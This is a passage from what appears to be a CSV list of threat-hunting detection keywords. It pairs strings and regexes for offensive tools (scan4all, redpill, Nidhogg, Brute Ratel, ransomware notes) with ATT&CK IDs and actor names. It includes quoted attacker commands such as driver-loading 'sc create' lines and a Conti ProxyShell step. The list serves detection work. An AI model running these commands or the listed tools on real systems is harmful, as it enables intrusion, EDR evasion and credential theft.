Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","57928" "*sandboxevasion.py*",".{0,1000}sandboxevasion\.py.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","N/A","10","10","609","139","2024-07-18T10:16:19Z","2022-01-02T22:03:10Z","57929" "*Sandboxie detected!!!*",".{0,1000}Sandboxie\sdetected!!!.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","57930" "*sandeshyadavm46@gmail.com*",".{0,1000}sandeshyadavm46\@gmail\.com.{0,1000}","offensive_tool_keyword","pastehakk","perform clipboard poisoning or paste jacking attack","T1115","T0001 - T0002 - T0005","N/A","N/A","Phishing","https://github.com/3xploitGuy/pastehakk","1","0","#linux #email","N/A","7","1","56","10","2020-06-22T01:17:53Z","2020-06-17T19:32:24Z","57931" "*santat7kpllt6iyvqbr7q4amdv6dzrh6paatvyrzl7ry3zm72zigf4ad.onion*",".{0,1000}santat7kpllt6iyvqbr7q4amdv6dzrh6paatvyrzl7ry3zm72zigf4ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","57933" "*SAP_GW_RCE_exploit*",".{0,1000}SAP_GW_RCE_exploit.{0,1000}","offensive_tool_keyword","SAP_GW_RCE_exploit","This PoC exploits an ACL misconfiguration in the SAP Gateway (port 33xx) that leads to a Remote Command Execution (RCE).SAPanonGWv1.py is 
the first version of the exploit based on raw packets sent. It does not require any additional modules (Run and Pwn!) SAPanonGWv2.py is the second version of the exploit based on the pysap library","T1078 - T1046 - T1201 - T1021","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tool","https://github.com/chipik/SAP_GW_RCE_exploit","1","0","N/A","N/A","N/A","2","151","45","2020-09-07T13:46:04Z","2019-03-14T13:52:00Z","57934" "*sap2john.pl*",".{0,1000}sap2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","57935" "*sap3r-encrypthub/encrypthub*",".{0,1000}sap3r\-encrypthub\/encrypthub.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","1","N/A","N/A","10","7","N/A","N/A","N/A","N/A","57936" "*SARAH.BARRICK@PROTONMAIL.COM*",".{0,1000}SARAH\.BARRICK\@PROTONMAIL\.COM.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","57937" "*SauronEye.exe*",".{0,1000}SauronEye\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","57938" "*save the Fernet encryption/decryption key *",".{0,1000}save\sthe\sFernet\sencryption\/decryption\skey\s.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","57939" "*saycheese-master.zip*",".{0,1000}saycheese\-master\.zip.{0,1000}","offensive_tool_keyword","saycheese","Grab target's webcam shots by link","T1213 - T1071 - T1102 - T1123 - T1185 - T1200","TA0001 - TA0005 - TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/hangetzzu/saycheese","1","1","N/A","N/A","9","10","1175","962","2024-06-18T23:39:41Z","2019-04-29T04:07:00Z","57940" "*sc create dellserv binPath=C:\dbutil_2_3.sys type=kernel*",".{0,1000}sc\screate\sdellserv\sbinPath\=C\:\\dbutil_2_3\.sys\stype\=kernel.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#servicename","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","57953" "*sc create plumber*warpzoneclient*",".{0,1000}sc\screate\splumber.{0,1000}warpzoneclient.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","57954" "*sc create Terminator *.sys*",".{0,1000}sc\screate\sTerminator\s.{0,1000}\.sys.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","57957" "*sc delete plumber*",".{0,1000}sc\sdelete\splumber.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","58022" "*sc -path c:\inetpub\wwwroot\aspnet_client\test.txt -value teset*",".{0,1000}sc\s\-path\sc\:\\inetpub\\wwwroot\\aspnet_client\\test\.txt\s\-value\steset.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #7","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","58046" "*sc start nidhogg*",".{0,1000}sc\sstart\snidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation 
tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","58050" "*sc_inject_direct.exe*",".{0,1000}sc_inject_direct\.exe.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","N/A","4","326","39","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z","58092" "*sc_inject_indirect.exe*",".{0,1000}sc_inject_indirect\.exe.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","N/A","4","326","39","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z","58093" "*scada_default_userpass.txt*",".{0,1000}scada_default_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58095" "*scan -T list_of_targets.txt*",".{0,1000}scan\s\-T\slist_of_targets\.txt.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","58096" "*scan_with_trufflehog(*",".{0,1000}scan_with_trufflehog\(.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","#content","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","58097" "*scan4all -*",".{0,1000}scan4all\s\-.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58098" "*scan4all -*.xml*",".{0,1000}scan4all\s\-.{0,1000}\.xml.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web 
fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58099" "*scan4all -h*",".{0,1000}scan4all\s\-h.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58100" "*scan4all -tp *",".{0,1000}scan4all\s\-tp\s.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58101" "*scan4all.51pwn.com*",".{0,1000}scan4all\.51pwn\.com.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58102" 
"*scan4all.51pwn.com/*",".{0,1000}scan4all\.51pwn\.com\/.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58103" "*scan4all_*.*_linux_amd64.zip*",".{0,1000}scan4all_.{0,1000}\..{0,1000}_linux_amd64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","#linux","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58104" "*scan4all_*.*_macOS_amd64.zip*",".{0,1000}scan4all_.{0,1000}\..{0,1000}_macOS_amd64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58105" "*scan4all_*.*_macOS_arm64.zip*",".{0,1000}scan4all_.{0,1000}\..{0,1000}_macOS_arm64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58106" "*scan4all_*.*_windows_amd64.zip*",".{0,1000}scan4all_.{0,1000}\..{0,1000}_windows_amd64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58107" "*scan4all_*_linux_amd64.zip*",".{0,1000}scan4all_.{0,1000}_linux_amd64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","#linux","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58108" "*scan4all_*_windows_amd64.zip*",".{0,1000}scan4all_.{0,1000}_windows_amd64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58109" "*scan4all_windows_386.exe*",".{0,1000}scan4all_windows_386\.exe.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58110" "*scan4all_windows_amd64.exe*",".{0,1000}scan4all_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58111" "*scan4all-main*",".{0,1000}scan4all\-main.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","58112" "*ScanInterception_x64.ps1*",".{0,1000}ScanInterception_x64\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58113" 
"*scanless*",".{0,1000}scanless.{0,1000}","offensive_tool_keyword","scanless","This is a Python 3 command-line utility and library for using websites that can perform port scans on your behalf","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/vesche/scanless","1","0","N/A","N/A","N/A","10","1120","169","2023-08-07T15:12:42Z","2017-05-05T02:53:01Z","58114" "*scanner/backdoor*",".{0,1000}scanner\/backdoor.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58115" "*scannerport.go -*",".{0,1000}scannerport\.go\s\-.{0,1000}","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Discovery","https://github.com/luijait/GONET-Scanner","1","0","N/A","network exploitation tool","N/A","1","82","21","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z","58116" "*Scanners-Box*",".{0,1000}Scanners\-Box.{0,1000}","offensive_tool_keyword","Scanners-Box","Scanners Box also known as scanbox. is a powerful hacker toolkit. which has collected more than 10 categories of open source scanners from Github. including subdomain. database. middleware and other modular design scanner etc. But for other Well-known scanning tools. such as nmap. w3af. brakeman. arachni. nikto. metasploit. 
aircrack-ng will not be included in the scope of collection.","T1190 - T1210.001 - T1595 - T1192","TA0007 - TA0002 - TA0008 - ","N/A","N/A","Exploitation tool","https://github.com/We5ter/Scanners-Box","1","0","N/A","N/A","N/A","10","8459","2387","2024-11-11T10:23:21Z","2016-12-24T16:07:50Z","58117" "*Scanning ConsoleHost_History for creds*",".{0,1000}Scanning\sConsoleHost_History\sfor\screds.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58118" "*Scanning credential store for creds!*",".{0,1000}Scanning\scredential\sstore\sfor\screds!.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58119" "*Scanning for Sandboxie?*",".{0,1000}Scanning\sfor\sSandboxie\?.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE 
(Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","58120" "*Scanning registry for winlogon creds*",".{0,1000}Scanning\sregistry\sfor\swinlogon\screds.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58121" "*Scanning Teamviewer for creds!*",".{0,1000}Scanning\sTeamviewer\sfor\screds!.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58122" "*Scanning winlogon for crypted creds!*",".{0,1000}Scanning\swinlogon\sfor\scrypted\screds!.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp 
shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58123" "*ScanProcessForBadgerConfig*",".{0,1000}ScanProcessForBadgerConfig.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58124" "*ScanTCPImplant*",".{0,1000}ScanTCPImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
